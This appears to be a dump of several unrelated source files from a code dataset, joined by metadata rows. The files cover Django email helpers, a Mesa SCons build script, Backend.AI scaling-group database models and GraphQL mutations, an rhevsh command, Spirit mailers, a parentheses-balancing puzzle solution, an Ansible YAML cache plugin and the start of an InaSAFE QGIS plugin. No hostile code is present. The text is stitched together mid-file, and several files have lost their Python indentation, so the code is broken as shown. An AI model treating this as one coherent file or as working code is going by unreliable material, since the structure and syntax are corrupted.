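# placeholders; the 'html' and 'sms' keys are included because the dispatch
# methods look them up.
def _example_dispatch_direct_message(recipient_email):
    dispatcher = Dispatcher()
    messages = {
        'subject': 'Your order has shipped',
        'body': 'Thanks for shopping with us.',
        'html': '',
        'sms': '',
    }
    dispatcher.dispatch_direct_messages(recipient_email, messages)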
def get_password_reset_url(user, token_generator=default_token_generator):
"""
Generate a password-reset URL for a given user
"""
kwargs = {
'token': token_generator.make_token(user),
'uidb64': urlsafe_base64_encode(force_bytes(user.id)),
}
return reverse('password-reset-confirm', kwargs=kwargs)
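# Illustrative sketch (assumption, not part of the original module): turning
# the relative reset path above into an absolute link for an email body, using
# the current request to supply scheme and host.
def _example_absolute_reset_url(request, user):
    return request.build_absolute_uri(get_password_reset_url(user))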
def normalise_email(email):
"""
The local part of an email address is case-sensitive, the domain part
isn't. This function lowercases the host and should be used in all email
handling.
"""
clean_email = email.strip()
if '@' in clean_email:
local, host = clean_email.split('@')
return local + '@' + host.lower()
return clean_email
| bsd-3-clause | -8,306,801,830,486,856,000 | 34.242424 | 79 | 0.577386 | false | 4.642715 | false | false | false |
s20121035/rk3288_android5.1_repo | external/mesa3d/common.py | 12 | 3337 | #######################################################################
# Common SCons code
import os
import os.path
import re
import subprocess
import sys
import platform as _platform
import SCons.Script.SConscript
#######################################################################
# Defaults
host_platform = _platform.system().lower()
if host_platform.startswith('cygwin'):
host_platform = 'cygwin'
# Search sys.argv[] for a "platform=foo" argument since we don't have
# an 'env' variable at this point.
if 'platform' in SCons.Script.ARGUMENTS:
target_platform = SCons.Script.ARGUMENTS['platform']
else:
target_platform = host_platform
_machine_map = {
'x86': 'x86',
'i386': 'x86',
'i486': 'x86',
'i586': 'x86',
'i686': 'x86',
'BePC': 'x86',
'Intel': 'x86',
'ppc' : 'ppc',
'BeBox': 'ppc',
'BeMac': 'ppc',
'AMD64': 'x86_64',
'x86_64': 'x86_64',
'sparc': 'sparc',
'sun4u': 'sparc',
}
# find host_machine value
if 'PROCESSOR_ARCHITECTURE' in os.environ:
host_machine = os.environ['PROCESSOR_ARCHITECTURE']
else:
host_machine = _platform.machine()
host_machine = _machine_map.get(host_machine, 'generic')
default_machine = host_machine
default_toolchain = 'default'
if target_platform == 'windows' and host_platform != 'windows':
default_machine = 'x86'
default_toolchain = 'crossmingw'
# find default_llvm value
if 'LLVM' in os.environ:
default_llvm = 'yes'
else:
default_llvm = 'no'
try:
if target_platform != 'windows' and \
subprocess.call(['llvm-config', '--version'], stdout=subprocess.PIPE) == 0:
default_llvm = 'yes'
except:
pass
#######################################################################
# Common options
def AddOptions(opts):
try:
from SCons.Variables.BoolVariable import BoolVariable as BoolOption
except ImportError:
from SCons.Options.BoolOption import BoolOption
try:
from SCons.Variables.EnumVariable import EnumVariable as EnumOption
except ImportError:
from SCons.Options.EnumOption import EnumOption
opts.Add(EnumOption('build', 'build type', 'debug',
allowed_values=('debug', 'checked', 'profile', 'release')))
opts.Add(BoolOption('verbose', 'verbose output', 'no'))
opts.Add(EnumOption('machine', 'use machine-specific assembly code', default_machine,
allowed_values=('generic', 'ppc', 'x86', 'x86_64')))
opts.Add(EnumOption('platform', 'target platform', host_platform,
allowed_values=('cygwin', 'darwin', 'freebsd', 'haiku', 'linux', 'sunos', 'windows')))
opts.Add(BoolOption('embedded', 'embedded build', 'no'))
opts.Add('toolchain', 'compiler toolchain', default_toolchain)
opts.Add(BoolOption('gles', 'EXPERIMENTAL: enable OpenGL ES support', 'no'))
opts.Add(BoolOption('llvm', 'use LLVM', default_llvm))
opts.Add(BoolOption('openmp', 'EXPERIMENTAL: compile with openmp (swrast)', 'no'))
opts.Add(BoolOption('debug', 'DEPRECATED: debug build', 'yes'))
opts.Add(BoolOption('profile', 'DEPRECATED: profile build', 'no'))
opts.Add(BoolOption('quiet', 'DEPRECATED: profile build', 'yes'))
opts.Add(BoolOption('texture_float', 'enable floating-point textures and renderbuffers', 'no'))
if host_platform == 'windows':
opts.Add(EnumOption('MSVS_VERSION', 'MS Visual C++ version', None, allowed_values=('7.1', '8.0', '9.0')))
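# Illustrative sketch (assumption, not part of the original build scripts): a
# minimal SConstruct would feed these options into a build environment roughly
# as below; Variables, Environment, Help and ARGUMENTS come from SCons.Script.
def _example_sconstruct_usage():
    from SCons.Script import Variables, Environment, Help, ARGUMENTS
    opts = Variables('config.py', ARGUMENTS)
    AddOptions(opts)
    env = Environment(variables=opts)
    Help(opts.GenerateHelpText(env))
    return env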
| gpl-3.0 | -422,272,697,593,503,300 | 31.398058 | 107 | 0.635301 | false | 3.363911 | false | false | false |
lablup/backend.ai-manager | src/ai/backend/manager/models/scaling_group.py | 1 | 18805 | from __future__ import annotations
from typing import (
Any,
Dict,
Sequence,
Set,
TYPE_CHECKING,
Union,
)
import uuid
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql as pgsql
from sqlalchemy.engine.row import Row
from sqlalchemy.ext.asyncio import AsyncConnection as SAConnection
import graphene
from graphene.types.datetime import DateTime as GQLDateTime
from .base import (
metadata,
simple_db_mutate,
simple_db_mutate_returning_item,
set_if_set,
batch_result,
)
from .group import resolve_group_name_or_id
from .user import UserRole
if TYPE_CHECKING:
from .gql import GraphQueryContext
__all__: Sequence[str] = (
# table defs
'scaling_groups',
'sgroups_for_domains',
'sgroups_for_groups',
'sgroups_for_keypairs',
# functions
'query_allowed_sgroups',
'ScalingGroup',
'CreateScalingGroup',
'ModifyScalingGroup',
'DeleteScalingGroup',
'AssociateScalingGroupWithDomain',
'AssociateScalingGroupWithUserGroup',
'AssociateScalingGroupWithKeyPair',
'DisassociateScalingGroupWithDomain',
'DisassociateScalingGroupWithUserGroup',
'DisassociateScalingGroupWithKeyPair',
)
scaling_groups = sa.Table(
'scaling_groups', metadata,
sa.Column('name', sa.String(length=64), primary_key=True),
sa.Column('description', sa.String(length=512)),
sa.Column('is_active', sa.Boolean, index=True, default=True),
sa.Column('created_at', sa.DateTime(timezone=True),
server_default=sa.func.now()),
sa.Column('driver', sa.String(length=64), nullable=False),
sa.Column('driver_opts', pgsql.JSONB(), nullable=False, default={}),
sa.Column('scheduler', sa.String(length=64), nullable=False),
sa.Column('scheduler_opts', pgsql.JSONB(), nullable=False, default={}),
)
# When scheduling, we take the union of allowed scaling groups for
# each domain, group, and keypair.
sgroups_for_domains = sa.Table(
'sgroups_for_domains', metadata,
sa.Column('scaling_group',
sa.ForeignKey('scaling_groups.name',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.Column('domain',
sa.ForeignKey('domains.name',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.UniqueConstraint('scaling_group', 'domain', name='uq_sgroup_domain'),
)
sgroups_for_groups = sa.Table(
'sgroups_for_groups', metadata,
sa.Column('scaling_group',
sa.ForeignKey('scaling_groups.name',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.Column('group',
sa.ForeignKey('groups.id',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.UniqueConstraint('scaling_group', 'group', name='uq_sgroup_ugroup'),
)
sgroups_for_keypairs = sa.Table(
'sgroups_for_keypairs', metadata,
sa.Column('scaling_group',
sa.ForeignKey('scaling_groups.name',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.Column('access_key',
sa.ForeignKey('keypairs.access_key',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.UniqueConstraint('scaling_group', 'access_key', name='uq_sgroup_akey'),
)
async def query_allowed_sgroups(
db_conn: SAConnection,
domain_name: str,
group: Union[uuid.UUID, str],
access_key: str,
) -> Sequence[Row]:
query = (
sa.select([sgroups_for_domains])
.where(sgroups_for_domains.c.domain == domain_name)
)
result = await db_conn.execute(query)
from_domain = {row['scaling_group'] for row in result}
group_id = await resolve_group_name_or_id(db_conn, domain_name, group)
from_group: Set[str]
if group_id is None:
from_group = set() # empty
else:
query = (
sa.select([sgroups_for_groups])
.where(
(sgroups_for_groups.c.group == group_id)
)
)
result = await db_conn.execute(query)
from_group = {row['scaling_group'] for row in result}
query = (sa.select([sgroups_for_keypairs])
.where(sgroups_for_keypairs.c.access_key == access_key))
result = await db_conn.execute(query)
from_keypair = {row['scaling_group'] for row in result}
sgroups = from_domain | from_group | from_keypair
query = (sa.select([scaling_groups])
.where(
(scaling_groups.c.name.in_(sgroups)) &
(scaling_groups.c.is_active)
))
result = await db_conn.execute(query)
return [row for row in result]
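# Illustrative sketch (not part of the original module): fetching just the
# names of the scaling groups a request may use. ``db`` is assumed to be the
# manager's async SQLAlchemy engine exposing begin_readonly(), as used by the
# GraphQL loaders below.
async def _example_allowed_sgroup_names(
    db,
    domain_name: str,
    group: Union[uuid.UUID, str],
    access_key: str,
) -> Sequence[str]:
    async with db.begin_readonly() as conn:
        rows = await query_allowed_sgroups(conn, domain_name, group, access_key)
    return [row['name'] for row in rows]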
class ScalingGroup(graphene.ObjectType):
name = graphene.String()
description = graphene.String()
is_active = graphene.Boolean()
created_at = GQLDateTime()
driver = graphene.String()
driver_opts = graphene.JSONString()
scheduler = graphene.String()
scheduler_opts = graphene.JSONString()
@classmethod
def from_row(
cls,
ctx: GraphQueryContext,
row: Row | None,
) -> ScalingGroup | None:
if row is None:
return None
return cls(
name=row['name'],
description=row['description'],
is_active=row['is_active'],
created_at=row['created_at'],
driver=row['driver'],
driver_opts=row['driver_opts'],
scheduler=row['scheduler'],
scheduler_opts=row['scheduler_opts'],
)
@classmethod
async def load_all(
cls,
ctx: GraphQueryContext,
*,
is_active: bool = None,
) -> Sequence[ScalingGroup]:
query = sa.select([scaling_groups]).select_from(scaling_groups)
if is_active is not None:
query = query.where(scaling_groups.c.is_active == is_active)
async with ctx.db.begin_readonly() as conn:
return [
obj async for row in (await conn.stream(query))
if (obj := cls.from_row(ctx, row)) is not None
]
@classmethod
async def load_by_domain(
cls,
ctx: GraphQueryContext,
domain: str,
*,
is_active: bool = None,
) -> Sequence[ScalingGroup]:
j = sa.join(
scaling_groups, sgroups_for_domains,
scaling_groups.c.name == sgroups_for_domains.c.scaling_group)
query = (
sa.select([scaling_groups])
.select_from(j)
.where(sgroups_for_domains.c.domain == domain)
)
if is_active is not None:
query = query.where(scaling_groups.c.is_active == is_active)
async with ctx.db.begin_readonly() as conn:
return [
obj async for row in (await conn.stream(query))
if (obj := cls.from_row(ctx, row)) is not None
]
@classmethod
async def load_by_group(
cls,
ctx: GraphQueryContext,
group: uuid.UUID,
*,
is_active: bool = None,
) -> Sequence[ScalingGroup]:
j = sa.join(
scaling_groups, sgroups_for_groups,
scaling_groups.c.name == sgroups_for_groups.c.scaling_group
)
query = (
sa.select([scaling_groups])
.select_from(j)
.where(sgroups_for_groups.c.group == group)
)
if is_active is not None:
query = query.where(scaling_groups.c.is_active == is_active)
async with ctx.db.begin_readonly() as conn:
return [
obj async for row in (await conn.stream(query))
if (obj := cls.from_row(ctx, row)) is not None
]
@classmethod
async def load_by_keypair(
cls,
ctx: GraphQueryContext,
access_key: str,
*,
is_active: bool = None,
) -> Sequence[ScalingGroup]:
j = sa.join(
scaling_groups, sgroups_for_keypairs,
scaling_groups.c.name == sgroups_for_keypairs.c.scaling_group)
query = (
sa.select([scaling_groups])
.select_from(j)
.where(sgroups_for_keypairs.c.access_key == access_key)
)
if is_active is not None:
query = query.where(scaling_groups.c.is_active == is_active)
async with ctx.db.begin_readonly() as conn:
return [
obj async for row in (await conn.stream(query))
if (obj := cls.from_row(ctx, row)) is not None
]
@classmethod
async def batch_load_by_name(
cls,
ctx: GraphQueryContext,
names: Sequence[str],
) -> Sequence[ScalingGroup | None]:
query = (
sa.select([scaling_groups])
.select_from(scaling_groups)
.where(scaling_groups.c.name.in_(names))
)
async with ctx.db.begin_readonly() as conn:
return await batch_result(
ctx, conn, query, cls,
names, lambda row: row['name'],
)
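# Illustrative sketch (not part of the original module): a resolver that lists
# the active scaling groups attached to a domain. ``info.context`` is assumed
# to carry the GraphQueryContext used throughout this module.
async def _example_resolve_domain_sgroups(info, domain_name: str) -> Sequence[ScalingGroup]:
    graph_ctx = info.context
    return await ScalingGroup.load_by_domain(graph_ctx, domain_name, is_active=True)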
class CreateScalingGroupInput(graphene.InputObjectType):
description = graphene.String(required=False, default='')
is_active = graphene.Boolean(required=False, default=True)
driver = graphene.String(required=True)
driver_opts = graphene.JSONString(required=False, default={})
scheduler = graphene.String(required=True)
scheduler_opts = graphene.JSONString(required=False, default={})
class ModifyScalingGroupInput(graphene.InputObjectType):
description = graphene.String(required=False)
is_active = graphene.Boolean(required=False)
driver = graphene.String(required=False)
driver_opts = graphene.JSONString(required=False)
scheduler = graphene.String(required=False)
scheduler_opts = graphene.JSONString(required=False)
class CreateScalingGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
name = graphene.String(required=True)
props = CreateScalingGroupInput(required=True)
ok = graphene.Boolean()
msg = graphene.String()
scaling_group = graphene.Field(lambda: ScalingGroup, required=False)
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
name: str,
props: CreateScalingGroupInput,
) -> CreateScalingGroup:
data = {
'name': name,
'description': props.description,
'is_active': bool(props.is_active),
'driver': props.driver,
'driver_opts': props.driver_opts,
'scheduler': props.scheduler,
'scheduler_opts': props.scheduler_opts,
}
insert_query = (
sa.insert(scaling_groups).values(data)
)
return await simple_db_mutate_returning_item(
cls, info.context, insert_query, item_cls=ScalingGroup
)
class ModifyScalingGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
name = graphene.String(required=True)
props = ModifyScalingGroupInput(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
name: str,
props: ModifyScalingGroupInput,
) -> ModifyScalingGroup:
data: Dict[str, Any] = {}
set_if_set(props, data, 'description')
set_if_set(props, data, 'is_active')
set_if_set(props, data, 'driver')
set_if_set(props, data, 'driver_opts')
set_if_set(props, data, 'scheduler')
set_if_set(props, data, 'scheduler_opts')
update_query = (
sa.update(scaling_groups)
.values(data)
.where(scaling_groups.c.name == name)
)
return await simple_db_mutate(cls, info.context, update_query)
class DeleteScalingGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
name = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
name: str,
) -> DeleteScalingGroup:
delete_query = (
sa.delete(scaling_groups)
.where(scaling_groups.c.name == name)
)
return await simple_db_mutate(cls, info.context, delete_query)
class AssociateScalingGroupWithDomain(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
domain = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
domain: str,
) -> AssociateScalingGroupWithDomain:
insert_query = (
sa.insert(sgroups_for_domains)
.values({
'scaling_group': scaling_group,
'domain': domain,
})
)
return await simple_db_mutate(cls, info.context, insert_query)
class DisassociateScalingGroupWithDomain(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
domain = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
domain: str,
) -> DisassociateScalingGroupWithDomain:
delete_query = (
sa.delete(sgroups_for_domains)
.where(
(sgroups_for_domains.c.scaling_group == scaling_group) &
(sgroups_for_domains.c.domain == domain)
)
)
return await simple_db_mutate(cls, info.context, delete_query)
class DisassociateAllScalingGroupsWithDomain(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
domain = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
domain: str,
) -> DisassociateAllScalingGroupsWithDomain:
delete_query = (
sa.delete(sgroups_for_domains)
.where(sgroups_for_domains.c.domain == domain)
)
return await simple_db_mutate(cls, info.context, delete_query)
class AssociateScalingGroupWithUserGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
user_group = graphene.UUID(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
user_group: uuid.UUID,
) -> AssociateScalingGroupWithUserGroup:
insert_query = (
sa.insert(sgroups_for_groups)
.values({
'scaling_group': scaling_group,
'group': user_group,
})
)
return await simple_db_mutate(cls, info.context, insert_query)
class DisassociateScalingGroupWithUserGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
user_group = graphene.UUID(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
user_group: uuid.UUID,
) -> DisassociateScalingGroupWithUserGroup:
delete_query = (
sa.delete(sgroups_for_groups)
.where(
(sgroups_for_groups.c.scaling_group == scaling_group) &
(sgroups_for_groups.c.group == user_group)
)
)
return await simple_db_mutate(cls, info.context, delete_query)
class DisassociateAllScalingGroupsWithGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
user_group = graphene.UUID(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
user_group: uuid.UUID,
) -> DisassociateAllScalingGroupsWithGroup:
delete_query = (
sa.delete(sgroups_for_groups)
.where(sgroups_for_groups.c.group == user_group)
)
return await simple_db_mutate(cls, info.context, delete_query)
class AssociateScalingGroupWithKeyPair(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
access_key = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
access_key: str,
) -> AssociateScalingGroupWithKeyPair:
insert_query = (
sa.insert(sgroups_for_keypairs)
.values({
'scaling_group': scaling_group,
'access_key': access_key,
})
)
return await simple_db_mutate(cls, info.context, insert_query)
class DisassociateScalingGroupWithKeyPair(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
access_key = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
access_key: str,
) -> DisassociateScalingGroupWithKeyPair:
delete_query = (
sa.delete(sgroups_for_keypairs)
.where(
(sgroups_for_keypairs.c.scaling_group == scaling_group) &
(sgroups_for_keypairs.c.access_key == access_key)
)
)
return await simple_db_mutate(cls, info.context, delete_query)
| lgpl-3.0 | 5,024,193,378,153,518,000 | 28.849206 | 78 | 0.591811 | false | 3.916077 | false | false | false |
geertj/rhevsh | lib/rhevsh/command/disconnect.py | 2 | 1221 | #
# This file is part of python-rhev. python-rhev is free software that is
# made available under the MIT license. Consult the file "LICENSE" that
# is distributed together with this file for the exact licensing terms.
#
# python-rhev is copyright (c) 2010-2011 by the python-rhev authors. See
# the file "AUTHORS" for a complete overview.
from rhev import Connection, Error as RhevError
from rhevsh.command.command import RhevCommand
class DisconnectCommand(RhevCommand):
name = 'disconnect'
description = 'disconnect from RHEV manager'
helptext = """\
== Usage ==
disconnect
== Description ==
Disconnect an active connection to RHEV manager, if any. This method
can be called multiple times. It is not an error to disconnect when
not connected.
"""
def execute(self):
stdout = self.context.terminal.stdout
connection = self.context.connection
if connection is None:
stdout.write('not connected\n')
return
try:
connection.close()
except RhevError, e:
pass
stdout.write('disconnected from RHEV manager\n')
self.context.connection = None
| mit | -6,982,907,321,741,989,000 | 29.525 | 76 | 0.659296 | false | 4.329787 | false | false | false |
nitely/Spirit | spirit/user/utils/email.py | 1 | 1304 | # -*- coding: utf-8 -*-
from django.utils.translation import gettext as _
from django.template.loader import render_to_string
from djconfig import config
from spirit.core.utils import site_url
from spirit.core import tasks
from .tokens import (
UserActivationTokenGenerator,
UserEmailChangeTokenGenerator)
# XXX remove; use tasks for everything
def sender(request, subject, template_name, context, to):
context['site'] = site_url()
context['site_name'] = config.site_name
message = render_to_string(template_name, context)
# Subject cannot contain new lines
subject = ''.join(subject.splitlines())
tasks.send_email(subject, message, to)
def send_activation_email(request, user):
subject = _("User activation")
template_name = 'spirit/user/activation_email.html'
token = UserActivationTokenGenerator().generate(user)
context = {'user_id': user.pk, 'token': token}
sender(request, subject, template_name, context, [user.email, ])
def send_email_change_email(request, user, new_email):
subject = _("Email change")
template_name = 'spirit/user/email_change_email.html'
token = UserEmailChangeTokenGenerator().generate(user, new_email)
context = {'token': token}
sender(request, subject, template_name, context, [user.email, ])
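# Illustrative sketch (assumption, not part of the original module): how a
# registration view might hand a newly created, still-inactive user to
# send_activation_email() above. ``form`` is assumed to be a valid user form.
def _example_register(request, form):
    user = form.save()
    send_activation_email(request, user)
    return user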
| mit | 9,153,052,069,552,357,000 | 33.315789 | 69 | 0.716258 | false | 3.725714 | false | false | false |
l33tdaima/l33tdaima | pr1249m/min_remove_to_make_valid.py | 1 | 1249 | class Solution:
    def minRemoveToMakeValidV1(self, s: str) -> str:
        # Record the indices of every matched '(' / ')' pair with a stack,
        # then keep only non-parenthesis characters and matched parentheses.
        matched, stack = set(), list()
for i, c in enumerate(s):
if c == "(":
stack.append(i)
elif c == ")" and len(stack) > 0:
matched.add(stack.pop())
matched.add(i)
return "".join([c for i, c in enumerate(s) if c not in "()" or i in matched])
    def minRemoveToMakeValidV2(self, s: str) -> str:
        # Collect the indices to drop: unmatched ')' as they are seen, plus
        # any '(' still left on the stack at the end.
        removed, stack = set(), list()
for i, c in enumerate(s):
if c == "(":
stack.append(i)
elif c == ")":
if len(stack) > 0:
stack.pop()
else:
removed.add(i)
removed |= set(stack)
return "".join(
[c for i, c in enumerate(s) if c not in "()" or i not in removed]
)
# TESTS
for s, expected in [
("lee(t(c)o)de)", "lee(t(c)o)de"),
("a)b(c)d", "ab(c)d"),
("))((", ""),
("(a(b(c)d)", "a(b(c)d)"),
]:
sol = Solution()
actual = sol.minRemoveToMakeValidV1(s)
print(f"Minimum Remove to Make '{s}' Valid Parentheses -> {actual}")
assert actual == expected
assert expected == sol.minRemoveToMakeValidV2(s)
| mit | 1,408,042,470,552,632,300 | 31.025641 | 85 | 0.470777 | false | 3.375676 | false | false | false |
mheap/ansible | lib/ansible/plugins/cache/yaml.py | 15 | 1924 | # (c) 2017, Brian Coca
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
cache: yaml
short_description: YAML formatted files.
description:
- This cache uses YAML formatted, per host, files saved to the filesystem.
version_added: "2.3"
author: Brian Coca (@bcoca)
options:
_uri:
required: True
description:
- Path in which the cache plugin will save the files
type: list
env:
- name: ANSIBLE_CACHE_PLUGIN_CONNECTION
ini:
- key: fact_caching_connection
section: defaults
_prefix:
description: User defined prefix to use when creating the files
env:
- name: ANSIBLE_CACHE_PLUGIN_PREFIX
ini:
- key: fact_caching_prefix
section: defaults
_timeout:
default: 86400
description: Expiration timeout for the cache plugin data
env:
- name: ANSIBLE_CACHE_PLUGIN_TIMEOUT
ini:
- key: fact_caching_timeout
section: defaults
type: integer
'''
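# Illustrative example (assumption, not part of the original plugin): the
# options documented above are usually supplied from ansible.cfg, e.g.:
#
#   [defaults]
#   fact_caching = yaml
#   fact_caching_connection = /tmp/ansible_fact_cache
#   fact_caching_prefix = facts_
#   fact_caching_timeout = 86400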
import codecs
import yaml
from ansible.parsing.yaml.loader import AnsibleLoader
from ansible.parsing.yaml.dumper import AnsibleDumper
from ansible.plugins.cache import BaseFileCacheModule
class CacheModule(BaseFileCacheModule):
"""
A caching module backed by yaml files.
"""
def _load(self, filepath):
with codecs.open(filepath, 'r', encoding='utf-8') as f:
return AnsibleLoader(f).get_single_data()
def _dump(self, value, filepath):
with codecs.open(filepath, 'w', encoding='utf-8') as f:
yaml.dump(value, f, Dumper=AnsibleDumper, default_flow_style=False)
| gpl-3.0 | 4,063,753,266,278,565,000 | 28.151515 | 92 | 0.634615 | false | 4.016701 | false | false | false |
b3ngmann/python-pastime | ps5/ps5_recursion.py | 1 | 2868 | # 6.00x Problem Set 5
#
# Part 2 - RECURSION
#
# Problem 3: Recursive String Reversal
#
def reverseString(aStr):
"""
Given a string, recursively returns a reversed copy of the string.
For example, if the string is 'abc', the function returns 'cba'.
The only string operations you are allowed to use are indexing,
slicing, and concatenation.
aStr: a string
returns: a reversed string
"""
if len(aStr) == 0 or len(aStr) == 1:
return aStr
else:
return aStr[-1] + reverseString(aStr[:-1])
print reverseString('abc')
#
# Problem 4: X-ian
#
def x_ian(x, word):
"""
Given a string x, returns True if all the letters in x are
contained in word in the same order as they appear in x.
>>> x_ian('eric', 'meritocracy')
True
>>> x_ian('eric', 'cerium')
False
>>> x_ian('john', 'mahjong')
False
x: a string
word: a string
returns: True if word is x_ian, False otherwise
"""
if len(x) == 0:
return True
elif len(x) == 1:
return x in word
elif x[0] in word:
return x_ian(x[1:], word[word.find(x[0])+1:])
else:
return False
print x_ian('eric', 'meritocracy')
print x_ian('eric', 'cerium')
print x_ian('sarina', 'czarina')
print x_ian('alvin', 'palavering')
print x_ian('john', 'mahjong')
print x_ian('eric', 'algebraic')
#
# Problem 5: Typewriter
#
def insertNewlines(text, lineLength):
"""
Given text and a desired line length, wrap the text as a typewriter would.
Insert a newline character ("\n") after each word that reaches or exceeds
the desired line length.
text: a string containing the text to wrap.
line_length: the number of characters to include on a line before wrapping
the next word.
returns: a string, with newline characters inserted appropriately.
"""
#words = text.split()
    if len(text) <= lineLength:  # <= guards against indexing text[lineLength] when the remainder is exactly lineLength long
return text
else:
if text[lineLength] == ' ':
return text[:lineLength + 1] + '\n' + insertNewlines(text[lineLength + 1:].lstrip(), lineLength)
else:
if text.find(' ', lineLength - 1) != -1:
return text[:text.find(' ', lineLength - 1)] + '\n' + insertNewlines(text[text.find(' ', lineLength-1):].lstrip(), lineLength)
else:
return text[:] #+ '\n' + insertNewlines(text[:].lstrip(), lineLength)
print insertNewlines('Random text to wrap again.', 5)
print
print insertNewlines('While I expect new intellectual adventures ahead, nothing will compare to the exhilaration of the world-changing accomplishments that we produced together.', 15)
print
print insertNewlines('Nuh-uh! We let users vote on comments and display them by number of votes. Everyone knows that makes it impossible for a few persistent voices to dominate the discussion.', 20) | mit | -5,427,299,215,341,551,000 | 31.602273 | 198 | 0.636681 | false | 3.57606 | false | false | false |
gijs/inasafe | safe_qgis/plugin.py | 1 | 19440 | """
InaSAFE Disaster risk assessment tool developed by AusAid -
**QGIS plugin implementation.**
Contact : [email protected]
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import logging
LOGGER = logging.getLogger('InaSAFE')
__author__ = '[email protected]'
__revision__ = '$Format:%H$'
__date__ = '10/01/2011'
__copyright__ = 'Copyright 2012, Australia Indonesia Facility for '
__copyright__ += 'Disaster Reduction'
import os
# Import the PyQt and QGIS libraries
from PyQt4.QtCore import (QObject,
QLocale,
QTranslator,
SIGNAL,
QCoreApplication,
Qt,
QSettings,
QVariant)
from PyQt4.QtGui import QAction, QIcon, QApplication, QMessageBox, QDockWidget
try:
# When upgrading, using the plugin manager, you may get an error when
# doing the following import, so we wrap it in a try except
# block and then display a friendly message to restart QGIS
from safe_qgis.exceptions import TranslationLoadError
except ImportError:
# Note these strings cant be translated.
QMessageBox.warning(None, 'InaSAFE',
'Please restart QGIS to use this plugin.')
import utilities
class Plugin:
"""The QGIS interface implementation for the Risk in a box plugin.
This class acts as the 'glue' between QGIS and our custom logic.
It creates a toolbar and menubar entry and launches the InaSAFE user
interface if these are activated.
"""
def __init__(self, iface):
"""Class constructor.
On instantiation, the plugin instance will be assigned a copy
of the QGIS iface object which will allow this plugin to access and
manipulate the running QGIS instance that spawned it.
Args:
iface - a Quantum GIS QGisAppInterface instance. This instance
is automatically passed to the plugin by QGIS when it loads the
plugin.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# Save reference to the QGIS interface
self.iface = iface
self.translator = None
self.setupI18n()
#print self.tr('InaSAFE')
utilities.setupLogger()
#noinspection PyArgumentList
def setupI18n(self, thePreferredLocale=None):
"""Setup internationalisation for the plugin.
See if QGIS wants to override the system locale
and then see if we can get a valid translation file
for whatever locale is effectively being used.
Args:
thePreferredLocale - optional parameter which if set
will override any other way of determining locale..
Returns:
None.
Raises:
TranslationLoadException
"""
myOverrideFlag = QSettings().value('locale/overrideFlag',
QVariant(False)).toBool()
if thePreferredLocale is not None:
myLocaleName = thePreferredLocale
elif myOverrideFlag:
myLocaleName = QSettings().value('locale/userLocale',
QVariant('')).toString()
else:
myLocaleName = QLocale.system().name()
# NOTES: we split the locale name because we need the first two
# character i.e. 'id', 'af, etc
myLocaleName = str(myLocaleName).split('_')[0]
# Also set the system locale to the user overridden local
# so that the inasafe library functions gettext will work
# .. see:: :py:func:`common.utilities`
os.environ['LANG'] = str(myLocaleName)
LOGGER.debug('%s %s %s %s' % (thePreferredLocale , myOverrideFlag,
QLocale.system().name(),
os.environ['LANG']))
myRoot = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
myTranslationPath = os.path.join(myRoot, 'safe_qgis', 'i18n',
'inasafe_' + str(myLocaleName) + '.qm')
